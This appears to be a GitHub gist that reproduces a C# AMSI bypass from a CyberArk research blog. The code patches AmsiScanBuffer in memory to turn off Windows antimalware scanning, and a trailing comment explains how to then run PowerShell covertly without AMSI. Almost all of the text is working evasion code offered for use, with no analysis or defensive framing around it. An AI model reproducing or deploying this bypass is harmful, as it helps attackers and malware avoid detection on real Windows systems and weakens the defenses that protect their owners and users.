Last active
February 1, 2019 18:51
Copy of AMSIBypass2 from cyberark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static string run() | |
| { | |
| IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll | |
| if (dllHandle == null) return "error"; | |
| //Get the AmsiScanBuffer function address | |
| IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer"); | |
| if (AmsiScanbufferAddr == null) return "error"; | |
| IntPtr OldProtection = Marshal.AllocHGlobal(4); //pointer to store the current AmsiScanBuffer memory protection | |
| //Pointer changing the AmsiScanBuffer memory protection from readable only to writeable (0x40) | |
| bool VirtualProtectRc = VirtualProtect(AmsiScanbufferAddr, 0x0015, 0x40, OldProtection); | |
| if (VirtualProtectRc == false) return "error"; | |
| //The new patch opcode | |
| var patch = new byte[] {0x31,0xff,0x90}; | |
| //Setting a pointer to the patch opcode array (unmanagedPointer) | |
| IntPtr unmanagedPointer = Marshal.AllocHGlobal(3); | |
| Marshal.Copy(patch, 0, unmanagedPointer,3); | |
| //Patching the relevant line (the line which submits the rd8 to the edi register) with the xor edi,edi opcode | |
| MoveMemory(AmsiScanbufferAddr + 0x001b, unmanagedPointer, 3); | |
| return "OK"; | |
| } | |
| /** To run Powershell covertly from C#, first do the above. Then, use the System.Automation.PowerShell class to run Powershell without AMSI. | |
| * https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.powershell?view=powershellsdk-1.1.0 | |
| * Follow the linked documentation to run the Powershell through a Runspace without AMSI. | |
| **/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment